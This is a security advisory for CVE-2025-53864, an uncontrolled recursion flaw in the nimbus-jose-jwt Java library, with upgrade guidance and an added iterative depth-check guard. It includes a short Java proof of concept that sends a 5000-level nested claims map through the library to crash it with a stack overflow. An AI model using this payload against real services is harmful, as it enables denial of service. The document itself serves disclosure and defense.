Uncontrolled Recursion Affecting com.nimbusds:nimbus-jose-jwt package, versions [,10.0.2)


Severity: medium

CVSS assessment by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.1% (28th percentile)

  • Snyk ID: SNYK-JAVA-COMNIMBUSDS-10691768
  • published: 11 Jul 2025
  • disclosed: 11 Jul 2025
  • credit: Johannes Fredén

Introduced: 11 Jul 2025

CVE-2025-53864
CWE-674

How to fix?

Upgrade com.nimbusds:nimbus-jose-jwt to version 10.0.2 or higher.

Overview

com.nimbusds:nimbus-jose-jwt is a library for JSON Web Tokens (JWT)

Affected versions of this package are vulnerable to Uncontrolled Recursion due to the improper handling of JWT claim sets containing deeply nested JSON objects. An attacker can cause application downtime or resource exhaustion by submitting a specially crafted JWT with excessive nesting.

Note:

This issue only affects nimbus-jose-jwt, not Gson, because the Connect2id product could have checked the JSON object nesting depth, regardless of what limits (if any) were imposed by Gson.

PoC

import com.nimbusds.jwt.JWTClaimsSet;
import java.text.ParseException;
import java.util.HashMap;
import java.util.Map;

public class Test {
    // This builds a claimset with a deeply nested map, which could theoretically be supplied by a client.
    // If the JWT is serialized into JSON (for example, in logging or debugging), it can cause a StackOverflowError.
    public static void main(String[] args) throws ParseException {        
        Map<String, Object> nestedMap = new HashMap<>();
        Map<String, Object> currentLevel = nestedMap;

        for (int i = 0; i < 5000; i++) {
            Map<String, Object> nextLevel = new HashMap<>();
            currentLevel.put("", nextLevel);
            currentLevel = nextLevel;
        }

        JWTClaimsSet claimSet = JWTClaimsSet.parse(nestedMap);

        // This will cause a StackOverflowError due to excessive recursion in GSON's serialization
        claimSet.toString();
    }
}
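
A defensive check for the condition the PoC triggers, as an added example that is not part of the advisory or of nimbus-jose-jwt: it walks a claims map iteratively and rejects it when the nesting exceeds a limit, before the map is handed to JWTClaimsSet.parse or serialized. The names ClaimDepthGuard and withinDepth and the limit of 32 are assumptions chosen for illustration, and the code needs Java 9 or later for Map.of.

```java
import java.util.ArrayDeque;
import java.util.Collection;
import java.util.Deque;
import java.util.HashMap;
import java.util.Map;

public class ClaimDepthGuard {
    // Hypothetical limit for this example; set it to what legitimate tokens need.
    static final int MAX_DEPTH = 32;
    // Returns true if no Map or Collection in the structure is nested deeper than maxDepth.
    static boolean withinDepth(Object root, int maxDepth) {
        // Explicit stack instead of recursion, so the guard cannot overflow the call stack itself.
        Deque<Object[]> stack = new ArrayDeque<>();
        stack.push(new Object[] {root, 1});
        while (!stack.isEmpty()) {
            Object[] frame = stack.pop();
            Object node = frame[0];
            int depth = (Integer) frame[1];
            Collection<?> children;
            if (node instanceof Map) {
                children = ((Map<?, ?>) node).values();
            } else if (node instanceof Collection) {
                children = (Collection<?>) node;
            } else {
                continue; // scalar (or null) claim value, nothing nested
            }
            if (depth > maxDepth) { return false; } // also stops on cyclic structures
            for (Object child : children) {
                stack.push(new Object[] {child, depth + 1});
            }
        }
        return true;
    }

    public static void main(String[] args) {
        // Constructed input: the same 5000-level map shape the PoC builds.
        Map<String, Object> deep = new HashMap<>();
        Map<String, Object> cur = deep;
        for (int i = 0; i < 5000; i++) {
            Map<String, Object> next = new HashMap<>();
            cur.put("", next);
            cur = next;
        }
        // Constructed input: an ordinary claims map with one nested object.
        Map<String, Object> normal = Map.of("sub", "alice", "address", Map.of("country", "SE"));
        System.out.println("normal claims accepted: " + withinDepth(normal, MAX_DEPTH));
        System.out.println("deep claims accepted:   " + withinDepth(deep, MAX_DEPTH));
    }
}
```

A check like this is a stopgap for code that cannot be upgraded immediately; the fix stated above is version 10.0.2 or higher.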
